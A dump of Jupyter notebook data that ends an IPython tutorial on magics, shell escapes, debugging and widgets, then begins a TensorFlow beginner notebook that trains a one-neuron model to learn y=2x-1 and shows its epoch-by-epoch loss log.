"You can suppress the storage and rendering of output if you append `;` to the last cell (this comes in handy when plotting with matplotlib, for example):",
"_____no_output_____"
]
],
[
[
"10+20;",
"_____no_output_____"
],
[
"_",
"_____no_output_____"
]
],
[
[
"The output is stored in `_N` and `Out[N]` variables:",
"_____no_output_____"
]
],
[
[
"_11 == Out[11]",
"_____no_output_____"
]
],
[
[
"Previous inputs are available, too:",
"_____no_output_____"
]
],
[
[
"In[11]",
"_____no_output_____"
],
[
"_i",
"_____no_output_____"
],
[
"%history -n 1-5",
"_____no_output_____"
]
],
[
[
"**Exercise**\n\nUse `%history?` to have a look at `%history`'s magic documentation, and write the last 10 lines of history to a file named `log.py`.",
"_____no_output_____"
],
[
"## Accessing the underlying operating system\n",
"_____no_output_____"
]
],
[
[
"!pwd",
"_____no_output_____"
],
[
"files = !ls \nprint(\"files this directory:\")\nprint(files)",
"_____no_output_____"
],
[
"files",
"_____no_output_____"
],
[
"!echo $files",
"_____no_output_____"
],
[
"!echo {files[0].upper()}",
"_____no_output_____"
]
],
[
[
"Note that all this is available even in multiline blocks:",
"_____no_output_____"
]
],
[
[
"import os\nfor i,f in enumerate(files):\n if f.endswith('ipynb'):\n !echo {\"%02d\" % i} - \"{os.path.splitext(f)[0]}\"\n else:\n print('--')",
"_____no_output_____"
]
],
[
[
"## Beyond Python: magic functions\n\nThe IPyhton 'magic' functions are a set of commands, invoked by prepending one or two `%` signs to their name, that live in a namespace separate from your normal Python variables and provide a more command-like interface. They take flags with `--` and arguments without quotes, parentheses or commas. The motivation behind this system is two-fold:\n \n- To provide an namespace for controlling IPython itself and exposing other system-oriented functionality that is separate from your Python variables and functions. This lets you have a `cd` command accessible as a magic regardless of whether you have a Python `cd` variable.\n\n- To expose a calling mode that requires minimal verbosity and typing while working interactively. Thus the inspiration taken from the classic Unix shell style for commands.",
"_____no_output_____"
]
],
[
[
"%magic",
"_____no_output_____"
]
],
[
[
"Line vs cell magics:\n\nMagics can be applied at the single-line level or to entire cells. Line magics are identified with a single `%` prefix, while cell magics use `%%` and can only be used as the first line of the cell (since they apply to the entire cell). Some magics, like the convenient `%timeit` that ships built-in with IPython, can be called in either mode, while others may be line- or cell-only (you can see all magics with `%lsmagic`).\n\nLet's see this with some `%timeit` examples:",
"_____no_output_____"
]
],
[
[
"%timeit list(range(1000))",
"_____no_output_____"
],
[
"%%timeit\n# comment here\n\nlist(range(10))\nlist(range(100))",
"_____no_output_____"
]
],
[
[
"Line magics can be used even inside code blocks:",
"_____no_output_____"
]
],
[
[
"for i in range(1, 5):\n size = i*100\n print('size:', size, end=' ')\n %timeit list(range(size))",
"_____no_output_____"
]
],
[
[
"Magics can do anything they want with their input, so it doesn't have to be valid Python (note that the below may not work on a Windows machine, depending on how you are running Jupyter on it):",
"_____no_output_____"
]
],
[
[
"%%bash\necho \"My shell is:\" $SHELL\necho \"My disk usage is:\"\ndf -h",
"_____no_output_____"
]
],
[
[
"Another interesting cell magic: create any file you want locally from the notebook:",
"_____no_output_____"
]
],
[
[
"%%writefile test.txt\nThis is a test file!\nIt can contain anything I want...\n\nAnd more...\n\n",
"_____no_output_____"
],
[
"!cat test.txt",
"_____no_output_____"
]
],
[
[
"Let's see what other magics are currently defined in the system:",
"_____no_output_____"
]
],
[
[
"%lsmagic",
"_____no_output_____"
],
[
"def to_optimize(N):\n total = [0,0]\n ta = 0\n tb = 0\n for i in range(N):\n for j in range(N):\n a = i**2\n b = j*2\n total[0] += a\n total[1] += b\n return total",
"_____no_output_____"
],
[
"%timeit to_optimize(1_000)",
"_____no_output_____"
],
[
"%prun to_optimize(1_000)",
"_____no_output_____"
]
],
[
[
"## Running normal Python code: execution and errors\n\nNot only can you input normal Python code, you can even paste straight from a Python or IPython shell session:",
"_____no_output_____"
]
],
[
[
">>> # Fibonacci series:\n... # the sum of two elements defines the next\n... a, b = 0, 1\n>>> while b < 10:\n... print(b)\n... a, b = b, a+b",
"_____no_output_____"
],
[
"In [1]: for i in range(10):\n ...: print(i, end=' ')\n ...: ",
"_____no_output_____"
]
],
[
[
"And when your code produces errors, you can control how they are displayed with the `%xmode` magic:",
"_____no_output_____"
]
],
[
[
"%%writefile mod.py\n\ndef f(x):\n return 1.0/(x-1)\n\ndef g(y):\n return f(y+1)",
"_____no_output_____"
]
],
[
[
"Now let's call the function `g` with an argument that would produce an error:",
"_____no_output_____"
]
],
[
[
"import mod\nmod.g(0)",
"_____no_output_____"
]
],
[
[
"## Basic debugging\n\nWhen running code interactively, it can be tricky to figure out how to debug... ",
"_____no_output_____"
]
],
[
[
"%debug",
"_____no_output_____"
],
[
"enjoy = input('Are you enjoying this tutorial? ')\nprint('enjoy is:', enjoy)",
"_____no_output_____"
]
],
[
[
"## Running code in other languages with special `%%` magics",
"_____no_output_____"
]
],
[
[
"%%perl\n@months = (\"July\", \"August\", \"September\");\nprint $months[0];",
"_____no_output_____"
]
],
[
[
"## Plotting in the notebook",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"x = np.linspace(0, 2*np.pi, 300)\ny = np.sin(x**2)\nplt.plot(x, y)\nplt.title(\"A little chirp\")",
"_____no_output_____"
]
],
[
[
"---\n\n## A quick tour of widgets\n\nThis is meant to provide a quick overview of some of the things you can do with Jupyter widgets. For more ideas, you can check out [the docs](https://ipywidgets.readthedocs.io/en/latest/), and the notebooks from the [ICESat2 Hackweek](https://github.com/ICESAT-2HackWeek/intro-jupyter-git)",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport ipywidgets\n\n%matplotlib inline",
"_____no_output_____"
],
[
"def sin_x(x, frequency=1, phase=0):\n return np.sin(\n 2*np.pi*frequency*x + phase\n )",
"_____no_output_____"
],
[
"def plot_sin_x(frequency=1, phase=0, title=\"a\"):\n x = np.linspace(-1, 1, 200)\n plt.plot(x, sin_x(x, frequency, phase))\n plt.title(title)",
"_____no_output_____"
],
[
"plot_sin_x()",
"_____no_output_____"
]
],
[
[
"### using interactive",
"_____no_output_____"
]
],
[
[
"widget = ipywidgets.interactive(plot_sin_x, frequency=1.5, phase=0.)\nwidget",
"_____no_output_____"
]
],
[
[
"### specifying the widgets",
"_____no_output_____"
]
],
[
[
"mywidget = ipywidgets.interactive(\n plot_sin_x,\n frequency = ipywidgets.FloatSlider(min=0, max=10, value=1, display=\"f\"),\n# phase = ipywidgets.FloatSlider(min=-np.pi, max=np.pi, value=0)\n phase = ipywidgets.FloatText(value=0),\n title = ipywidgets.ToggleButtons(options=[\"a\", \"b\"])\n)\nmywidget",
"_____no_output_____"
],
[
"mywidget.children[1].value",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e70874330582c74647ee8eceb12851fdb20d1041 | 63,217 | ipynb | Jupyter Notebook | Intro_to_Tensorflow_for_AIMLDL/week1/Helloworld_of_DL.ipynb | adityabingi/Tensorflow_Sepcialization_Coursera | 826e6011315f091053d57fafcc0ce094e32726f2 | [
"MIT"
] | 1 | 2021-03-31T14:03:04.000Z | 2021-03-31T14:03:04.000Z | Intro_to_Tensorflow_for_AIMLDL/week1/Helloworld_of_DL.ipynb | adityabingi/Tensorflow_Sepcialization_Coursera | 826e6011315f091053d57fafcc0ce094e32726f2 | [
"MIT"
] | null | null | null | Intro_to_Tensorflow_for_AIMLDL/week1/Helloworld_of_DL.ipynb | adityabingi/Tensorflow_Sepcialization_Coursera | 826e6011315f091053d57fafcc0ce094e32726f2 | [
"MIT"
] | null | null | null | 48.405054 | 431 | 0.391256 | [
[
[
"# The Hello World of Deep Learning with Neural Networks",
"_____no_output_____"
],
[
"Like every first app you should start with something super simple that shows the overall scaffolding for how your code works. \n\nIn the case of creating neural networks, the sample I like to use is one where it learns the relationship between two numbers. So, for example, if you were writing code for a function like this, you already know the 'rules' — \n\n\n```\nfloat hw_function(float x){\n float y = (2 * x) - 1;\n return y;\n}\n```\n\nSo how would you train a neural network to do the equivalent task? Using data! By feeding it with a set of Xs, and a set of Ys, it should be able to figure out the relationship between them. \n\nThis is obviously a very different paradigm than what you might be used to, so let's step through it piece by piece.\n",
"_____no_output_____"
],
[
"## Imports\n\nLet's start with our imports. Here we are importing TensorFlow and calling it tf for ease of use.\n\nWe then import a library called numpy, which helps us to represent our data as lists easily and quickly.\n\nThe framework for defining a neural network as a set of Sequential layers is called keras, so we import that too.",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras",
"_____no_output_____"
]
],
[
[
"## Define and Compile the Neural Network\n\nNext we will create the simplest possible neural network. It has 1 layer, and that layer has 1 neuron, and the input shape to it is just 1 value.",
"_____no_output_____"
]
],
[
[
"model = tf.keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])",
"WARNING: Logging before flag parsing goes to stderr.\nW0708 11:08:27.407203 140426386540416 deprecation.py:506] From /usr/local/lib/python3.6/dist-packages/tensorflow/python/ops/init_ops.py:1251: calling VarianceScaling.__init__ (from tensorflow.python.ops.init_ops) with dtype is deprecated and will be removed in a future version.\nInstructions for updating:\nCall initializer instance with the dtype argument instead of passing it to the constructor\n"
]
],
[
[
"Now we compile our Neural Network. When we do so, we have to specify 2 functions, a loss and an optimizer.\n\nIf you've seen lots of math for machine learning, here's where it's usually used, but in this case it's nicely encapsulated in functions for you. But what happens here — let's explain...\n\nWe know that in our function, the relationship between the numbers is y=2x-1. \n\nWhen the computer is trying to 'learn' that, it makes a guess...maybe y=10x+10. The LOSS function measures the guessed answers against the known correct answers and measures how well or how badly it did.\n\nIt then uses the OPTIMIZER function to make another guess. Based on how the loss function went, it will try to minimize the loss. At that point maybe it will come up with somehting like y=5x+5, which, while still pretty bad, is closer to the correct result (i.e. the loss is lower)\n\nIt will repeat this for the number of EPOCHS which you will see shortly. But first, here's how we tell it to use 'MEAN SQUARED ERROR' for the loss and 'STOCHASTIC GRADIENT DESCENT' for the optimizer. You don't need to understand the math for these yet, but you can see that they work! :)\n\nOver time you will learn the different and appropriate loss and optimizer functions for different scenarios. \n",
"_____no_output_____"
]
],
[
[
"model.compile(optimizer='sgd', loss='mean_squared_error')",
"_____no_output_____"
]
],
[
[
"## Providing the Data\n\nNext up we'll feed in some data. In this case we are taking 6 xs and 6ys. You can see that the relationship between these is that y=2x-1, so where x = -1, y=-3 etc. etc. \n\nA python library called 'Numpy' provides lots of array type data structures that are a defacto standard way of doing it. We declare that we want to use these by specifying the values as an np.array[]",
"_____no_output_____"
]
],
[
[
"xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-3.0, -1.0, 1.0, 3.0, 5.0, 7.0], dtype=float)",
"_____no_output_____"
]
],
[
[
"# Training the Neural Network",
"_____no_output_____"
],
[
"The process of training the neural network, where it 'learns' the relationship between the Xs and Ys is in the **model.fit** call. This is where it will go through the loop we spoke about above, making a guess, measuring how good or bad it is (aka the loss), using the opimizer to make another guess etc. It will do it for the number of epochs you specify. When you run this code, you'll see the loss on the right hand side.",
"_____no_output_____"
]
],
[
[
"model.fit(xs, ys, epochs=500)",
"Epoch 1/500\n6/6 [==============================] - 4s 597ms/sample - loss: 7.5053\nEpoch 2/500\n6/6 [==============================] - 0s 1ms/sample - loss: 6.0989\nEpoch 3/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.9883\nEpoch 4/500\n6/6 [==============================] - 0s 821us/sample - loss: 4.1107\nEpoch 5/500\n6/6 [==============================] - 0s 796us/sample - loss: 3.4164\nEpoch 6/500\n6/6 [==============================] - 0s 833us/sample - loss: 2.8665\nEpoch 7/500\n6/6 [==============================] - 0s 715us/sample - loss: 2.4301\nEpoch 8/500\n6/6 [==============================] - 0s 528us/sample - loss: 2.0832\nEpoch 9/500\n6/6 [==============================] - 0s 357us/sample - loss: 1.8067\nEpoch 10/500\n6/6 [==============================] - 0s 750us/sample - loss: 1.5858\nEpoch 11/500\n6/6 [==============================] - 0s 456us/sample - loss: 1.4086\nEpoch 12/500\n6/6 [==============================] - 0s 353us/sample - loss: 1.2659\nEpoch 13/500\n6/6 [==============================] - 0s 426us/sample - loss: 1.1504\nEpoch 14/500\n6/6 [==============================] - 0s 399us/sample - loss: 1.0563\nEpoch 15/500\n6/6 [==============================] - 0s 408us/sample - loss: 0.9792\nEpoch 16/500\n6/6 [==============================] - 0s 412us/sample - loss: 0.9155\nEpoch 17/500\n6/6 [==============================] - 0s 399us/sample - loss: 0.8624\nEpoch 18/500\n6/6 [==============================] - 0s 655us/sample - loss: 0.8177\nEpoch 19/500\n6/6 [==============================] - 0s 568us/sample - loss: 0.7797\nEpoch 20/500\n6/6 [==============================] - 0s 381us/sample - loss: 0.7469\nEpoch 21/500\n6/6 [==============================] - 0s 654us/sample - loss: 0.7185\nEpoch 22/500\n6/6 [==============================] - 0s 690us/sample - loss: 0.6934\nEpoch 23/500\n6/6 [==============================] - 0s 696us/sample - loss: 0.6710\nEpoch 24/500\n6/6 [==============================] - 0s 391us/sample - loss: 0.6508\nEpoch 25/500\n6/6 [==============================] - 0s 443us/sample - loss: 0.6324\nEpoch 26/500\n6/6 [==============================] - 0s 611us/sample - loss: 0.6154\nEpoch 27/500\n6/6 [==============================] - 0s 470us/sample - loss: 0.5997\nEpoch 28/500\n6/6 [==============================] - 0s 646us/sample - loss: 0.5849\nEpoch 29/500\n6/6 [==============================] - 0s 384us/sample - loss: 0.5710\nEpoch 30/500\n6/6 [==============================] - 0s 285us/sample - loss: 0.5577\nEpoch 31/500\n6/6 [==============================] - 0s 775us/sample - loss: 0.5451\nEpoch 32/500\n6/6 [==============================] - 0s 316us/sample - loss: 0.5329\nEpoch 33/500\n6/6 [==============================] - 0s 374us/sample - loss: 0.5213\nEpoch 34/500\n6/6 [==============================] - 0s 425us/sample - loss: 0.5100\nEpoch 35/500\n6/6 [==============================] - 0s 624us/sample - loss: 0.4990\nEpoch 36/500\n6/6 [==============================] - 0s 509us/sample - loss: 0.4884\nEpoch 37/500\n6/6 [==============================] - 0s 443us/sample - loss: 0.4781\nEpoch 38/500\n6/6 [==============================] - 0s 497us/sample - loss: 0.4681\nEpoch 39/500\n6/6 [==============================] - 0s 606us/sample - loss: 0.4583\nEpoch 40/500\n6/6 [==============================] - 0s 507us/sample - loss: 0.4487\nEpoch 41/500\n6/6 [==============================] - 0s 603us/sample - loss: 0.4394\nEpoch 42/500\n6/6 [==============================] - 0s 446us/sample - loss: 0.4303\nEpoch 43/500\n6/6 [==============================] - 0s 500us/sample - loss: 0.4214\nEpoch 44/500\n6/6 [==============================] - 0s 567us/sample - loss: 0.4127\nEpoch 45/500\n6/6 [==============================] - 0s 647us/sample - loss: 0.4042\nEpoch 46/500\n6/6 [==============================] - 0s 629us/sample - loss: 0.3958\nEpoch 47/500\n6/6 [==============================] - 0s 480us/sample - loss: 0.3877\nEpoch 48/500\n6/6 [==============================] - 0s 698us/sample - loss: 0.3797\nEpoch 49/500\n6/6 [==============================] - 0s 787us/sample - loss: 0.3719\nEpoch 50/500\n6/6 [==============================] - 0s 860us/sample - loss: 0.3642\nEpoch 51/500\n6/6 [==============================] - 0s 763us/sample - loss: 0.3567\nEpoch 52/500\n6/6 [==============================] - 0s 795us/sample - loss: 0.3494\nEpoch 53/500\n6/6 [==============================] - 0s 559us/sample - loss: 0.3422\nEpoch 54/500\n6/6 [==============================] - 0s 608us/sample - loss: 0.3352\nEpoch 55/500\n6/6 [==============================] - 0s 589us/sample - loss: 0.3283\nEpoch 56/500\n6/6 [==============================] - 0s 653us/sample - loss: 0.3215\nEpoch 57/500\n6/6 [==============================] - 0s 543us/sample - loss: 0.3149\nEpoch 58/500\n6/6 [==============================] - 0s 465us/sample - loss: 0.3085\nEpoch 59/500\n6/6 [==============================] - 0s 353us/sample - loss: 0.3021\nEpoch 60/500\n6/6 [==============================] - 0s 323us/sample - loss: 0.2959\nEpoch 61/500\n6/6 [==============================] - 0s 529us/sample - loss: 0.2898\nEpoch 62/500\n6/6 [==============================] - 0s 407us/sample - loss: 0.2839\nEpoch 63/500\n6/6 [==============================] - 0s 451us/sample - loss: 0.2781\nEpoch 64/500\n6/6 [==============================] - 0s 403us/sample - loss: 0.2723\nEpoch 65/500\n6/6 [==============================] - 0s 398us/sample - loss: 0.2667\nEpoch 66/500\n6/6 [==============================] - 0s 590us/sample - loss: 0.2613\nEpoch 67/500\n6/6 [==============================] - 0s 413us/sample - loss: 0.2559\nEpoch 68/500\n6/6 [==============================] - 0s 440us/sample - loss: 0.2506\nEpoch 69/500\n6/6 [==============================] - 0s 511us/sample - loss: 0.2455\nEpoch 70/500\n6/6 [==============================] - 0s 389us/sample - loss: 0.2405\nEpoch 71/500\n6/6 [==============================] - 0s 464us/sample - loss: 0.2355\nEpoch 72/500\n6/6 [==============================] - 0s 531us/sample - loss: 0.2307\nEpoch 73/500\n6/6 [==============================] - 0s 685us/sample - loss: 0.2259\nEpoch 74/500\n6/6 [==============================] - 0s 830us/sample - loss: 0.2213\nEpoch 75/500\n6/6 [==============================] - 0s 590us/sample - loss: 0.2168\nEpoch 76/500\n6/6 [==============================] - 0s 622us/sample - loss: 0.2123\nEpoch 77/500\n6/6 [==============================] - 0s 604us/sample - loss: 0.2079\nEpoch 78/500\n6/6 [==============================] - 0s 613us/sample - loss: 0.2037\nEpoch 79/500\n6/6 [==============================] - 0s 616us/sample - loss: 0.1995\nEpoch 80/500\n6/6 [==============================] - 0s 614us/sample - loss: 0.1954\nEpoch 81/500\n6/6 [==============================] - 0s 542us/sample - loss: 0.1914\nEpoch 82/500\n6/6 [==============================] - 0s 684us/sample - loss: 0.1874\nEpoch 83/500\n6/6 [==============================] - 0s 500us/sample - loss: 0.1836\nEpoch 84/500\n6/6 [==============================] - 0s 660us/sample - loss: 0.1798\nEpoch 85/500\n6/6 [==============================] - 0s 480us/sample - loss: 0.1761\nEpoch 86/500\n6/6 [==============================] - 0s 502us/sample - loss: 0.1725\nEpoch 87/500\n6/6 [==============================] - 0s 544us/sample - loss: 0.1690\nEpoch 88/500\n6/6 [==============================] - 0s 1ms/sample - loss: 0.1655\nEpoch 89/500\n6/6 [==============================] - 0s 577us/sample - loss: 0.1621\nEpoch 90/500\n6/6 [==============================] - 0s 985us/sample - loss: 0.1588\nEpoch 91/500\n6/6 [==============================] - 0s 407us/sample - loss: 0.1555\nEpoch 92/500\n6/6 [==============================] - 0s 666us/sample - loss: 0.1523\nEpoch 93/500\n6/6 [==============================] - 0s 562us/sample - loss: 0.1492\nEpoch 94/500\n6/6 [==============================] - 0s 471us/sample - loss: 0.1461\nEpoch 95/500\n6/6 [==============================] - 0s 599us/sample - loss: 0.1431\nEpoch 96/500\n6/6 [==============================] - 0s 431us/sample - loss: 0.1402\nEpoch 97/500\n6/6 [==============================] - 0s 983us/sample - loss: 0.1373\nEpoch 98/500\n6/6 [==============================] - 0s 672us/sample - loss: 0.1345\nEpoch 99/500\n6/6 [==============================] - 0s 664us/sample - loss: 0.1317\nEpoch 100/500\n6/6 [==============================] - 0s 652us/sample - loss: 0.1290\nEpoch 101/500\n6/6 [==============================] - 0s 683us/sample - loss: 0.1264\nEpoch 102/500\n6/6 [==============================] - 0s 497us/sample - loss: 0.1238\nEpoch 103/500\n6/6 [==============================] - 0s 509us/sample - loss: 0.1212\nEpoch 104/500\n6/6 [==============================] - 0s 553us/sample - loss: 0.1187\nEpoch 105/500\n6/6 [==============================] - 0s 615us/sample - loss: 0.1163\nEpoch 106/500\n6/6 [==============================] - 0s 502us/sample - loss: 0.1139\nEpoch 107/500\n6/6 [==============================] - 0s 498us/sample - loss: 0.1116\nEpoch 108/500\n6/6 [==============================] - 0s 506us/sample - loss: 0.1093\nEpoch 109/500\n6/6 [==============================] - 0s 492us/sample - loss: 0.1070\nEpoch 110/500\n6/6 [==============================] - 0s 661us/sample - loss: 0.1048\nEpoch 111/500\n6/6 [==============================] - 0s 634us/sample - loss: 0.1027\nEpoch 112/500\n6/6 [==============================] - 0s 466us/sample - loss: 0.1006\nEpoch 113/500\n6/6 [==============================] - 0s 375us/sample - loss: 0.0985\nEpoch 114/500\n6/6 [==============================] - 0s 360us/sample - loss: 0.0965\nEpoch 115/500\n6/6 [==============================] - 0s 428us/sample - loss: 0.0945\nEpoch 116/500\n6/6 [==============================] - 0s 441us/sample - loss: 0.0926\nEpoch 117/500\n6/6 [==============================] - 0s 554us/sample - loss: 0.0907\nEpoch 118/500\n6/6 [==============================] - 0s 734us/sample - loss: 0.0888\nEpoch 119/500\n6/6 [==============================] - 0s 704us/sample - loss: 0.0870\nEpoch 120/500\n6/6 [==============================] - 0s 647us/sample - loss: 0.0852\nEpoch 121/500\n6/6 [==============================] - 0s 518us/sample - loss: 0.0834\nEpoch 122/500\n6/6 [==============================] - 0s 450us/sample - loss: 0.0817\nEpoch 123/500\n6/6 [==============================] - 0s 477us/sample - loss: 0.0800\nEpoch 124/500\n6/6 [==============================] - 0s 397us/sample - loss: 0.0784\nEpoch 125/500\n6/6 [==============================] - 0s 455us/sample - loss: 0.0768\nEpoch 126/500\n6/6 [==============================] - 0s 522us/sample - loss: 0.0752\nEpoch 127/500\n6/6 [==============================] - 0s 442us/sample - loss: 0.0737\nEpoch 128/500\n6/6 [==============================] - 0s 678us/sample - loss: 0.0722\nEpoch 129/500\n6/6 [==============================] - 0s 567us/sample - loss: 0.0707\nEpoch 130/500\n6/6 [==============================] - 0s 585us/sample - loss: 0.0692\nEpoch 131/500\n6/6 [==============================] - 0s 350us/sample - loss: 0.0678\nEpoch 132/500\n6/6 [==============================] - 0s 436us/sample - loss: 0.0664\nEpoch 133/500\n6/6 [==============================] - 0s 521us/sample - loss: 0.0650\nEpoch 134/500\n6/6 [==============================] - 0s 380us/sample - loss: 0.0637\nEpoch 135/500\n6/6 [==============================] - 0s 653us/sample - loss: 0.0624\nEpoch 136/500\n6/6 [==============================] - 0s 670us/sample - loss: 0.0611\nEpoch 137/500\n6/6 [==============================] - 0s 542us/sample - loss: 0.0599\nEpoch 138/500\n6/6 [==============================] - 0s 661us/sample - loss: 0.0586\nEpoch 139/500\n6/6 [==============================] - 0s 525us/sample - loss: 0.0574\nEpoch 140/500\n6/6 [==============================] - 0s 650us/sample - loss: 0.0562\nEpoch 141/500\n6/6 [==============================] - 0s 443us/sample - loss: 0.0551\nEpoch 142/500\n6/6 [==============================] - 0s 469us/sample - loss: 0.0540\nEpoch 143/500\n6/6 [==============================] - 0s 517us/sample - loss: 0.0528\nEpoch 144/500\n6/6 [==============================] - 0s 571us/sample - loss: 0.0518\nEpoch 145/500\n6/6 [==============================] - 0s 531us/sample - loss: 0.0507\nEpoch 146/500\n6/6 [==============================] - 0s 519us/sample - loss: 0.0497\nEpoch 147/500\n6/6 [==============================] - 0s 530us/sample - loss: 0.0486\nEpoch 148/500\n6/6 [==============================] - 0s 510us/sample - loss: 0.0476\nEpoch 149/500\n6/6 [==============================] - 0s 545us/sample - loss: 0.0467\nEpoch 150/500\n6/6 [==============================] - 0s 561us/sample - loss: 0.0457\nEpoch 151/500\n6/6 [==============================] - 0s 536us/sample - loss: 0.0448\nEpoch 152/500\n6/6 [==============================] - 0s 656us/sample - loss: 0.0438\nEpoch 153/500\n6/6 [==============================] - 0s 665us/sample - loss: 0.0429\nEpoch 154/500\n6/6 [==============================] - 0s 561us/sample - loss: 0.0421\nEpoch 155/500\n6/6 [==============================] - 0s 528us/sample - loss: 0.0412\nEpoch 156/500\n6/6 [==============================] - 0s 562us/sample - loss: 0.0404\nEpoch 157/500\n6/6 [==============================] - 0s 454us/sample - loss: 0.0395\nEpoch 158/500\n6/6 [==============================] - 0s 586us/sample - loss: 0.0387\nEpoch 159/500\n6/6 [==============================] - 0s 450us/sample - loss: 0.0379\nEpoch 160/500\n6/6 [==============================] - 0s 600us/sample - loss: 0.0371\nEpoch 161/500\n6/6 [==============================] - 0s 437us/sample - loss: 0.0364\nEpoch 162/500\n6/6 [==============================] - 0s 464us/sample - loss: 0.0356\nEpoch 163/500\n6/6 [==============================] - 0s 477us/sample - loss: 0.0349\nEpoch 164/500\n6/6 [==============================] - 0s 1ms/sample - loss: 0.0342\nEpoch 165/500\n6/6 [==============================] - 0s 506us/sample - loss: 0.0335\nEpoch 166/500\n6/6 [==============================] - 0s 621us/sample - loss: 0.0328\nEpoch 167/500\n6/6 [==============================] - 0s 629us/sample - loss: 0.0321\nEpoch 168/500\n6/6 [==============================] - 0s 961us/sample - loss: 0.0315\nEpoch 169/500\n6/6 [==============================] - 0s 480us/sample - loss: 0.0308\nEpoch 170/500\n6/6 [==============================] - 0s 565us/sample - loss: 0.0302\nEpoch 171/500\n6/6 [==============================] - 0s 738us/sample - loss: 0.0296\nEpoch 172/500\n6/6 [==============================] - 0s 913us/sample - loss: 0.0289\nEpoch 173/500\n6/6 [==============================] - 0s 541us/sample - loss: 0.0284\nEpoch 174/500\n6/6 [==============================] - 0s 638us/sample - loss: 0.0278\nEpoch 175/500\n6/6 [==============================] - 0s 581us/sample - loss: 0.0272\nEpoch 176/500\n6/6 [==============================] - 0s 431us/sample - loss: 0.0266\nEpoch 177/500\n6/6 [==============================] - 0s 435us/sample - loss: 0.0261\nEpoch 178/500\n6/6 [==============================] - 0s 550us/sample - loss: 0.0256\nEpoch 179/500\n6/6 [==============================] - 0s 450us/sample - loss: 0.0250\nEpoch 180/500\n6/6 [==============================] - 0s 523us/sample - loss: 0.0245\nEpoch 181/500\n6/6 [==============================] - 0s 546us/sample - loss: 0.0240\nEpoch 182/500\n6/6 [==============================] - 0s 555us/sample - loss: 0.0235\nEpoch 183/500\n6/6 [==============================] - 0s 534us/sample - loss: 0.0230\nEpoch 184/500\n6/6 [==============================] - 0s 540us/sample - loss: 0.0226\nEpoch 185/500\n6/6 [==============================] - 0s 564us/sample - loss: 0.0221\nEpoch 186/500\n6/6 [==============================] - 0s 582us/sample - loss: 0.0216\nEpoch 187/500\n6/6 [==============================] - 0s 585us/sample - loss: 0.0212\nEpoch 188/500\n6/6 [==============================] - 0s 603us/sample - loss: 0.0208\nEpoch 189/500\n6/6 [==============================] - 0s 648us/sample - loss: 0.0203\nEpoch 190/500\n6/6 [==============================] - 0s 570us/sample - loss: 0.0199\nEpoch 191/500\n6/6 [==============================] - 0s 548us/sample - loss: 0.0195\nEpoch 192/500\n6/6 [==============================] - 0s 533us/sample - loss: 0.0191\nEpoch 193/500\n6/6 [==============================] - 0s 524us/sample - loss: 0.0187\nEpoch 194/500\n6/6 [==============================] - 0s 605us/sample - loss: 0.0183\nEpoch 195/500\n6/6 [==============================] - 0s 637us/sample - loss: 0.0180\nEpoch 196/500\n6/6 [==============================] - 0s 690us/sample - loss: 0.0176\nEpoch 197/500\n6/6 [==============================] - 0s 646us/sample - loss: 0.0172\nEpoch 198/500\n6/6 [==============================] - 0s 523us/sample - loss: 0.0169\nEpoch 199/500\n6/6 [==============================] - 0s 539us/sample - loss: 0.0165\nEpoch 200/500\n6/6 [==============================] - 0s 670us/sample - loss: 0.0162\nEpoch 201/500\n6/6 [==============================] - 0s 525us/sample - loss: 0.0159\nEpoch 202/500\n6/6 [==============================] - 0s 630us/sample - loss: 0.0155\nEpoch 203/500\n6/6 [==============================] - 0s 502us/sample - loss: 0.0152\nEpoch 204/500\n6/6 [==============================] - 0s 648us/sample - loss: 0.0149\nEpoch 205/500\n6/6 [==============================] - 0s 578us/sample - loss: 0.0146\nEpoch 206/500\n6/6 [==============================] - 0s 498us/sample - loss: 0.0143\nEpoch 207/500\n6/6 [==============================] - 0s 617us/sample - loss: 0.0140\nEpoch 208/500\n6/6 [==============================] - 0s 530us/sample - loss: 0.0137\nEpoch 209/500\n6/6 [==============================] - 0s 652us/sample - loss: 0.0134\nEpoch 210/500\n6/6 [==============================] - 0s 662us/sample - loss: 0.0132\nEpoch 211/500\n6/6 [==============================] - 0s 616us/sample - loss: 0.0129\nEpoch 212/500\n6/6 [==============================] - 0s 647us/sample - loss: 0.0126\nEpoch 213/500\n6/6 [==============================] - 0s 691us/sample - loss: 0.0124\nEpoch 214/500\n6/6 [==============================] - 0s 634us/sample - loss: 0.0121\nEpoch 215/500\n6/6 [==============================] 